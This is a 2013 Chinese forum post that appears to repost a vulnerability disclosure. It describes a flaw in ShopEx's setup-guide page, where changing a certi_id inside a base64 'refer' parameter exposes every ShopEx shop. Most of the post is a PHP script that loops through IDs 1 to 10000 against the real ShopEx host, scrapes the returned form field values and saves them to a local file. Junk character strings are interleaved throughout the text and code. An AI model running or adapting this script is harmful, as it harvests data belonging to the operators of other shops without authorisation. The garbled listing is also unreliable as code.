找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2751|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:9 t4 S1 Q) k$ h; G5 h3 n& d, M
ShopEx某接口缺陷,可遍历所有网站- R6 Z) z9 h3 M) |, a
详细说明:
, Y' o. m9 ^! f; y) Z3 k( _问题出现在shopex 网店使用向导页面
5 i2 B- V1 ?" ?4 F( b1 Y. `- f: N6 J6 I

6 c0 \7 h+ U# o( ^8 p; e7 O" @; t2 T1 \& a3 j: K
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
& K# ?" d3 V1 x, t, T
  K; \1 [, {; b- G! @- \, R0 [; f4 f+ B- Y0 g$ [' g  o4 u
5 O" {0 V8 h* A
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! m$ E( s& U; d4 Y
. ?% t) W" h4 A( I& [0 l4 u8 q1 }. o: e
6 O6 o5 m  P, a: u
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
/ p3 B- [1 f, T9 P  j- x
5 j: k% q' L) E6 `1 E" v/ f; ?  M  E

* V7 M$ ~& f7 r1 c3 |% ?<?php
) ^0 _' l: C9 t  R/ y2 j* i
- S' d/ Y- z, q& U4 n                for ($i=1; $i < 10000; $i++) { //遍历
4 A' }2 ?& f3 ]
7 C. C9 F9 j+ j- i                        ShowshopExD($i);
0 Z5 j2 n: b) T; r0 x- W5 J
0 c8 D$ _" c6 {* C9 O4 E                }
# L# Q: _. F8 G2 @' R% d" v/ I- I8 I9 T8 Z( O9 ^. {; B
                function ShowshopExD($cid) {% E: ?. S8 [& z7 z% F  E2 ]/ T

2 a6 B: ~* r% d* R- K  o: l                $url='http://guide.ecos.shopex.cn/step2.php';; K5 @/ [" P0 W) W

* `. L  m: F% c* J- |, W+ h                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
; V: f. f. ]: {3 r, _6 {5 f! x- `" o! M& R, }9 `
        $url = $url.'?refer='.$refer;$ t& E( O- _; L0 u4 N

2 ~: t* A- y9 S        $ch = curl_init($url);- `1 K. B  _7 r  i( D9 X! |

) j) j' ^; r7 h! Q! Z        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
' t0 f) s" t; U& r# m2 N: d9 o3 G' ~. E% l
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;& S9 q% ^4 R) I

/ d( ^+ C, l4 b. ^4 w3 ]        $result = curl_exec($ch);! Z% Z6 G$ @! f' {; Q

( `! T/ X. u5 M( I% f        $result = mb_convert_encoding($result, "gb2312", "UTF-8");" H1 S8 Y  P; l: R7 j1 E( Y
- G9 I, p& \) j0 [5 S- \
        if(strpos($result,$refer))
* |- J) ]; e: K, ]8 M
0 G, O1 V! b- m% i( @        {
; A: O7 Q5 \4 i" I$ t/ [
# S' ~$ |( E- a0 `0 a% B                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件5 c: T' J8 D. E
6 ?" m4 d+ s6 n, m4 Z! ?
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
1 b7 b6 y9 ]6 o! V7 c/ ?7 v% M( s4 T: @8 E5 T
                foreach ($value[1] as $key) {
9 b1 l/ C7 M& i# S- Q+ ^1 I" k5 v. L, ?1 C, b4 h: i
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);1 I  N$ C% Y& A) e/ T0 [7 Y" n, ]
+ o; d2 e) ]) o. D/ }" w
                        echo $res[1][0].':'.$res[3][0]."\r\n";' t( e7 ]) u. P

: L8 q* |7 ^8 L8 l                        $col =$res[1][0].':'.$res[3][0]."\r\n";
( {6 Q  d, V4 [1 d- h  n( s9 ]: X2 `- _8 {5 \3 \) I
                        fwrite($fp, $col, strlen($col));
2 X! C% l% p% R6 n% V4 Q6 N/ b6 N  u. t
                }
% X' W. {. v% D2 V2 ]0 C7 H3 W
. u& p2 q$ @, |  ~; M                echo '--------------------------------'."\r\n";
1 D) q1 L, m" F6 D3 e+ f# a$ C
8 V: [% \; F/ O5 z( `                fclose($fp);
' |5 h* Q6 ?: B1 M9 W
2 Q; m# ~% j$ w+ w1 @5 K        }
8 K* s) z9 F+ p" o5 c- ^* p5 ]' b2 e' [5 ~5 Q9 o) P& e4 _6 d
        flush();
9 O" D# U* A6 c1 N! K* k8 H
8 M% |1 M7 Y, w2 c$ b/ @& _- v& U9 X        curl_close($ch);% j2 L. K, N0 Z' C/ w
# F! G+ w5 k6 N2 E2 {2 `
                }6 s3 j4 }- U6 h

+ Q; }, i2 r$ C1 a$ Q! {?>+ y6 ^9 S- \9 @: B% y" G4 R
漏洞证明:
! H) m, k8 i4 A/ }http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
+ B8 r4 `2 r8 E( irefer换成其他加密方式9 r4 ]2 G) v- g, `7 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表